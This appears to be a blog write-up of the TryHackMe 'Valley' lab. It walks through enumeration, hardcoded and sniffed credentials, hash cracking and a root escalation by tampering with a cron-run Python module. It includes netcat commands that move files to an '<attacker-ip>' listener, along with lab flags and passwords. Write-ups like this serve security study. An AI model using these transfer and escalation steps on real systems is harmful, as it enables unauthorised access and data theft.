~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • Writeups

    THM Valley


    Recon:

    We first get all our exposed ports from Nmap, to see what we can work with. After that, we want to see what is the structure of the website, we’ll use FFUF to enumerate addresses we can work with.

    nmap -sV -sC -v 10.64.165.117

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 3072 c2:84:2a:c1:22:5a:10:f1:66:16:dd:a0:f6:04:62:95 (RSA)
    | 256 42:9e:2f:f6:3e:5a:db:51:99:62:71:c4:8c:22:3e:bb (ECDSA)
    |_ 256 2e:a0:a5:6c:d9:83:e0:01:6c:b9:8a:60:9b:63:86:72 (ED25519)
    80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
    |http-title: Site doesn’t have a title (text/html).
    | http-methods:
    |
    Supported Methods: POST OPTIONS HEAD GET
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    We first check the website and run a ffuf for further enumeration #### ffuf -u http://10.64.165.117/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt /gallery /static /pricing #### ffuf -u http://10.64.165.117/static/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt we ffuf the static and get a few numbers to check #### static/00 returns:

    dev notes from valleyDev:
    -add wedding photo examples
    -redo the editing on #4
    -remove /dev1243224123123
    -check for SIEM alerts

    http://10.64.165.117/dev1243224123123/ returns a login page

    Strangely enough the login doesn’t seem to send requests out to a database, the username and pass might be hardcoded

    As expected we find this inside the login-form-submit button
    >if (username === “siemDev” && password === “california”) {
    >window.location.href = “/dev1243224123123/devNotes37370.txt”;

    http://10.64.165.117/dev1243224123123/devNotes37370.txt returns:

    dev notes for ftp server:
    -stop reusing credentials
    -check for any vulnerabilies
    -stay up to date on patching
    -change ftp port to normal port

    Ran some extra nmap and we found

    PORT STATE SERVICE VERSION
    37370/tcp open ftp vsftpd 3.0.3
    Service Info: OS: Unix
    ___

    Vulnerability analysis:

    This might be our ftp server reusing some credentials

    At first, it hangs lets try direct ftp. We connect to the ftp server with
    >ftp siemDev@10.64.165.117 -p 37370

    We find some pcap file and download all of them for analysis

    FTPpcaps contained some interesting informations:

    USER anonymous
    PASS anonymous
    FTP-DATA AnnualReport.txt

    Line-based text data
    AnnualReport.txt BusinessReport.txt CISOReport.txt HrReport.txt ItReport.txt SecurityReport.txt

    HTTP1pcap

    GET /testcat_mb.html

    Referer: http://www.testingmcafeesites.com

    Mostly just testing some security using this testing address

    HTTP2pcap

    USER valleyDev
    PASS ph0t0s1234

    We test SSH & FTP

    SSH works. We see a user.txt We cat the content of the file.

    THM{k@l1_1n_th3_v@lley}
    ___ # Binary exploitation: #### Next we check sudo -l Sorry, user valleyDev may not run sudo on valley. #### First we want to download our Authenticator. We first need to download the Authenticator. nc -lvnp 6969 > valleyAuthenticator

    This sets a netcat listener on port 6969 and everything sent will be stored in valleyAuthenticator

    Next on our victim machine

    nc <attacker-ip> 6969 < valleyAuthenticator

    We use netcat installed on the victims machine to send the content of valleyAuthenticator file to our listener

    We should now have our file locally to work on

    We first inspect the strings composing the file with

    strings valleyAuthenticator > valleystrings.txt

    We reduce the noise with awk hiding everything that isn’t atleast 10char long

    awk ‘length($0) >= 10’ valleystrings.txt

    We find out that the file is encoded with upx so we go again after decoding

    upx -d valleyAuthenticator

    strings valleyAuthenticator > unpackedstrings.txt

    cat unpackedstrings.txt | awk ‘length($0) >= 7’

    Before parsing through all of this we run

    cat unpackedstrings.txt | awk ‘length($0) >= 7’ | grep pass -C 3

    This is very lucky as we get our first flag immediatly.

    dd2921cc76ee3abfd2beb60709056cfb

    Next we launch the Authenticator:

    Welcome to Valley Inc. Authenticator
    What is your username: 
    What is your password: 
    Authenticated
    Wrong Password or Username
    basic_string::_M_construct null not valid

    The first line in our Authenticator is the money line its md5

    We expand our line count with grep to 5 to make sure we get all the hashes

    cat unpackedstrings.txt | awk ‘length($0) >= 7’ | grep pass -C 5

    I9\$xv.I
    e6722920bab2326f8217e4bf6b1b58ac
    dd2921cc76ee3abfd2beb60709056cfb
    Welcome to Valley Inc. Authenticator
    What is your username: 
    What is your password: 
    Authenticated
    Wrong Password or Username
    basic_string::_M_construct null not valid
    basic_string::_M_construct null not valid
    terminate called recursively

    Post exploitation:

    Next we run through crackstation.net our md5

    dd2921cc76ee3abfd2beb60709056cfb valley

    e6722920bab2326f8217e4bf6b1b58ac liberty123

    We run valleyAuthenticator with

    user: valley password: liberty123

    It confirms our user and password so we switch to our new user with su

    su valley

    We are now valley

    We still can’t sudo -l so we’re going to send out linpeas to scan for vulns

    Lets repeat our nc commands from earlier but with linpeas.sh

    nc -lvnp 6969 > linpeas.sh
    nc <attacker-ip> 6969 < linpeas.sh
    chmod +x linpeas.sh
    ./linpeas.sh

    Not much to find with linpeas / it hangs and never finishes but theres a cronjob running as root in here to transform images using base64

    Checking our id we are part of the valleyAdmin group and we find a python3.8 to be usable not with root but valleyAdmin

    base64.py is also under valleyAdmin, since we can modify it lets just add a rev shell and wait for cron

    We get a root shell after a few seconds when the cronjob runs.

    cat the root flag

    THM{v@lley_0f_th3_sh@d0w_0f_pr1v3sc}


    Notes:

    Hard-coded credentials lead to a full system compromise, the webpage we have access at /dev1243224123123. We then get unrestricted access to the logs of a pcap file, which leads to SSH compromise. We then download the Authenticator file and pull it appart for some hashed but weak passwords.


    Tools: